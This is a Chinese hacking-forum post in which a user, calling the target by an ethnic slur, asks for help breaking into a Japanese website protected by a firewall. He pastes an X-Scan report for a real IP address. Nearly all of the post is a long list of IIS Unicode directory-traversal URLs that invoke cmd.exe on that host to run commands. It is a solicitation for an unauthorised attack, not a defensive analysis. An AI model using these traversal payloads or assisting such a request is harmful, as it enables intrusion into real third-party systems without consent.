20CN网络安全小组论坛 - 黑客进阶 - 小日本的网站，可惜装了防火墙！各位老大谁有办法？

论坛: 黑客进阶标题: 小日本的网站，可惜装了防火墙！各位老大谁有办法？

复制本贴地址

作者: popmental [popmental]

论坛用户

X-Scan 检测报告
本报表列出了被检测主机的详细漏洞信息, 请根据提示信息或链接内容进行相应修补. 欢迎参加X-Scan脚本翻译项目

检测结果
存活主机 1
漏洞数量 181
警告数量 87
提示数量 4

主机列表
主机检测结果
66.54.90.74 发现安全漏洞
主机摘要 - OS: Windows; PORT/TCP: 21, 80

[返回顶部]

主机分析: 66.54.90.74
主机地址端口/服务服务漏洞
66.54.90.74 www (80/tcp) 发现安全漏洞
66.54.90.74 ftp (21/tcp) 发现安全提示

安全漏洞及解决方案: 66.54.90.74
类型端口/服务安全漏洞及解决方案
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_bin/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/a.asp/..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/a.asp/..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/a.asp/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi-bin/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_mem_bin/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/a.asp/..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/a.asp/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/scripts/..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/cgi/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/_vti_cnf/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/exchange/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/msadc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/Rpc/check.bat/..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/PBServer/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
漏洞 www (80/tcp) IIS编码/解码漏洞: http://66.54.90.74/samples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
